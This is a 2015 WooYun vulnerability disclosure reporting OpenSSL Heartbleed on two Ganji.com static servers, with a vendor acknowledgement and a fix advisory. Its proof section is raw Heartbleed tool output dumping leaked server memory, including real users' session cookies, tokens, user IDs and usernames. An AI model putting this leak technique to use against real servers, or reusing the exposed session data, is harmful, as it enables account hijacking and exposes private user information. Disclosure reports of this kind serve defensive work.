当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107587

漏洞标题:赶集网某服务器存在OpenSSL HeartBleeding漏洞可抓cookie

相关厂商:赶集网

漏洞作者: lijiejie

提交时间:2015-04-13 11:56

修复时间:2015-05-28 12:18

公开时间:2015-05-28 12:18

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-23: 细节向核心白帽子及相关领域专家公开
2015-05-03: 细节向普通白帽子公开
2015-05-13: 细节向实习白帽子公开
2015-05-28: 细节向公众公开

简要描述:

赶集网某服务器存在OpenSSL HeartBleeding漏洞,可抓Cookie

详细说明:

sta1.ganji.com sta.ganji.com
存在OpenSSL HeartBleeding,可批量抓Cookie,抓取用户资料

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 1303
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@GET /public/css/v5/pub/pub_job_suc.cmb.__1427963068__.css HTTP/1.1..Host: sta.ganji.com..Connection: keep-alive..Cache-Control: max-age=0..Accept: text/css,*/*;q=0.1..User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36..Referer: http://www.ganji.com/common/success.php?id=1067761&district_id=0&street_id=-1&title=%E6%8B%9B%E7%94%B7%E5%A5%B3%E6%B7%98%E5%AE%9D%E6%9C%8D%E8%A3%85%E6%8B%8D%E6%91%84%E6%A8%A1%E7%89%B9&category=wanted&type=9&noSticky=&seed=&company_status=2&agent=0&charge_status=&from=wb&is_auto_save=&domain=nb&is_sync_pub=1&source=select&op=&is_tuiguang=1..Accept-Encoding: gzip,deflate,sdch..Accept-Language: zh-CN,zh;q=0.8..Cookie: ganji_xuuid=9b3f349e-0113-412b-bcb0-aec60da4cfed; JY_users=true; sex=mm; laststore=%7B%22shop_id%22%3A%22172427%22%2C%22city%22%3A601%2C%22user_id%22%3A391982864%7D; citydomain=nb; __utmganji_v20110909=0x710ca4defef174186794e537b8234cc; use_https=1; GANJISESSID=2a3f679f1a18298f481902b3e33f457c; sscode=6jDLLEQGFn7rBkzI6j65pGfR; GanjiUserName=%E4%B9%90%E6%B7%98%E6%91%84%E5%BD%B1; GanjiUserInfo=%7B%22user_id%22%3A464844324%2C%22email%22%3A%22%22%2C%22username%22%3A%22%5Cu4e50%5Cu6dd8%5Cu6444%5Cu5f71%22%2C%22user_name%22%3A%22%5Cu4e50%5Cu6dd8%5Cu6444%5Cu5f71%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B3%2C101%5D; supercookie=AQL0BQD0ZmV0WQuxBQLmZGyzLGAvAmEuAJV0Z2VjBQqxMGR1AwL4AQWwLzEzBGx3AQR%3D; vip_version=new; __utmt=1; iframe_resume_time=2; STA_DS=1; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_464844324,tid:1428890320281166}; NTKF_T2D_CLIENTID=guest8E983E59-51A1-9829-E22A-06632A7457D4; __utma=32156897.538460921.1427864853.1428738304.1428889987.104; __utmb=32156897.52.10.1428889987; __utmc=32156897; __utmz=32156897.1428889987.104.65.utmcsr=hao.360.cn|utmccn=(referral)|utmcmd=referral|utmcct=/; ganji_uuid=6163043133604336447902; _gl_tracker=%7B%22ca_source%22%3A%22hao.360.cn%22%2C%22ca_name%22%3A%22hao360_hao360_042_quanguoshouye%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22other_hao.360.cn%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A35586332696%2C%22kw%22%3A%22%E5%AE%81%E6%B3%A2%E6%B5%B7%E6%9B%99%E6%BC%AB%E8%8C%B9%E5%8C%96%E5%A6%86%E5%B7%A5%E4%BD%9C%E5%AE%A4%22%7D; __pva__=%5B%5B%221428896636%22%2C%22601_2_9_1067761%22%5D%2C%5B%221428896430%22%2C%22601_2_9_1067757%22%5D%2C%5B%221428896335%22%2C%22601_2_9_1067753%22%5D%2C%5B%221428896206%22%2C%22601_2_9_1067746%22%5D%2C%5B%221428895766%22%2C%22601_2_9_1067726%22%5D%2C%5B%221428895703%22%2C%22601_2_9_1067724%22%5D%5D..If-Modified-Since: Thu, 02 Apr 2015 09:34:44 GMT..*`..ZQZ.O]..user_id%22%3A454849680%7D.....tX.rB.W...7I..!.name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_806954745=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_815285356=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_796100967=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_681866235=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_682384915=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_835766685=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_328448921=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_835853449=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_855360649=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_1009383748=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_888799875=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221035%22%2C%22minor_category_name%22%3A%22%5Cu4fdd%5Cu59c6%22%2C%22refer_url%22%3A%22%5C%2Fbaomu%5C%2F%22%7D; ganji_fw_detail_876322305=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221035%22%2C%22minor_category_name%22%3A%22%5Cu4fdd%5Cu59c6%22%2C%22refer_url%22%3A%22%5C%2Fbaomu%5C%2F%22%7D; ganji_fw_detail_711596071=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A-1%2C%22major_category_name%22%3A%22%22%2C%22minor_category_id%22%3A%221035%22%2C%22minor_category_name%22%3A%22%5Cu4fdd%5Cu59c6%22%2C%22refer_url%22%3A%22%5C%2Fbaomu%5C%2F%22%7D; ganji_fw_detail_851629866=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_1219883954=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221034%22%2C%22minor_category_name%22%3A%22%5Cu6708%5Cu5ac2%22%2C%22refer_url%22%3A%22%5C%2Fyuesao%5C%2F%22%7D; codecheck=1; GanjiUserName=%E9%87%8C%E4%B8%8B%E6%B2%B3888; GanjiUserInfo=%7B%22user_id%22%3A454666070%2C%22email%22%3A%22%22%2C%22username%22%3A%22%5Cu91cc%5Cu4e0b%5Cu6cb3888%22%2C%22user_name%22%3A%22%5Cu91cc%5Cu4e0b%5Cu6cb3888%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B%5D; supercookie=AQH0AwL2ZQpjWQIwBQZkMTAuL2D3ZGL4MzAxAGL1MQSyMzZ1ZTWzAmOuLwZlMQxjLmR%3D; LastLoginTime=2003-1-1; ganji_fw_detail_1351305071=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221036%22%2C%22minor_category_name%22%3A%22%5Cu949f%5Cu70b9%5Cu5de5%22%2C%22refer_url%22%3A%22%5C%2Fzhongdiangong%5C%2F%22%7D; ganji_fw_detail_467631486=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221035%22%2C%22minor_category_name%22%3A%22%5Cu4fdd%5Cu59c6%22%2C%22refer_url%22%3A%22%5C%2Fbaomu%5C%2F%22%7D; ganji_fw_detail_1344044766=%7B%22city_id%22%3A%2265%22%2C%22city_name%22%3A%22%5Cu5357%5Cu4eac%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22186%22%2C%22major_category_name%22%3A%22%5Cu5bb6%5Cu653f%5Cu6708%5Cu5ac2%22%2C%22minor_category_id%22%3A%221035%22%2C%22minor_category_name%22%3A%22%5Cu4fdd%5Cu59c6%22%2C%22refer_url%22%3A%22%5C%2Fbaomu%5C%2F%22%7D; LOG_NO_UUID=7177692425_280125; use_https=1; STA_SL=1; STA_CK=2; STA_DS=1; _gl_tracker=%7B%22ca_i%22%3A%22-%22%7D; __utmc=32156897; GJ_app_ms_common_list_saveFilter=%7B%22nj%2Czhaopin%22%3A%5B%5B%22http%3A%2F%2Fnj.ganji.com%2Fzpshengchanzhizao%2F_%25E6%259C%2589%25E6%2589%258B%25E5%25B7%25A5%25E6%25B4%25BB%25E5%25B8%25A6%25E5%259B%259E%25E5%25AE%25B6%25E5%258A%25A0%25E5%25B7%25A5%2Fzhaopin%2F%3Fhq%3D1%22%2C%5B%22%E7%94%9F%E4%BA%A7%2F%E5%88%B6%E9%80%A0%22%2C%22%E6%9C%89%E6%89%8B%E5%B7%A5%E6%B4%BB%E5%B8%A6%E5%9B%9E%E5%AE%B6%E5%8A%A0%E5%B7%A5%22%5D%5D%5D%7D; __utmb=32156897.0.10.1041357545; _gl_speed=%5B%22%2Ffang2%2Fbaixia%2F%22%2C1041357533468%5D=~..f....*..v.6A..0.....22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_1448216795=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_37424751=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_187329708=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; __utmd=1; ganji_fw_detail_1408347529=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_1168551045=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_1055859220=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_994248985=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7DQqf{)_.L.G..7..u5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D; ganji_fw_detail_1208771905=%7B%22city_id%22%3A%22126%22%2C%22city_name%22%3A%22%5Cu9a6c%5Cu978d%5Cu5c71%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22193%22%2C%22major_category_name%22%3A%22%5Cu623f%5Cu5c4b%5Cu5bb6%5Cu5c45%5Cu7ef4%5Cu4fee%22%2C%22minor_category_id%22%3A-1%2C%22minor_category_name%22%3A%22%22%2C%22refer_url%22%3A%22%5C%2Fjiajuweixiu%5C%2F%22%7D....&W..?..yT.....%f.D.....[....9..K..~....%22city_name%22%3A%22%5Cu6c88%5Cu9633%22%2C%22district_id%22%3A-1%2C%22district_name%22%3A%22%22%2C%22street_id%22%3A-1%2C%22street_name%22%3A%22%22%2C%22major_category_id%22%3A%22565%22%2C%22major_category_name%22%3A%22%5Cu5efa%5Cu6750%22%2C%22minor_category_id%22%3A-1%2C%22minor_categ4^....r....c....9kc14282090
WARNING: server returned more data than it should - server is vulnerable!

修复方案:

升级OpenSSL

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-13 12:17

厂商回复:

感谢白帽子的提交,是我们工作的疏忽~

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-13 20:26 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    关注。

  2. 2015-05-28 13:44 | 苦咖啡 ( 实习白帽子 | Rank:55 漏洞数:10 | 我就一菜逼,来看大牛装逼的)

    @lijiejie 你的这个思路是不是用你自己写的那个域名爆破工具弄出来的这个子域名 然后把那些子域名的所指向的IP 全部批量检测漏洞呢?用的什么工具去检测这些IP可能存在的漏洞呢?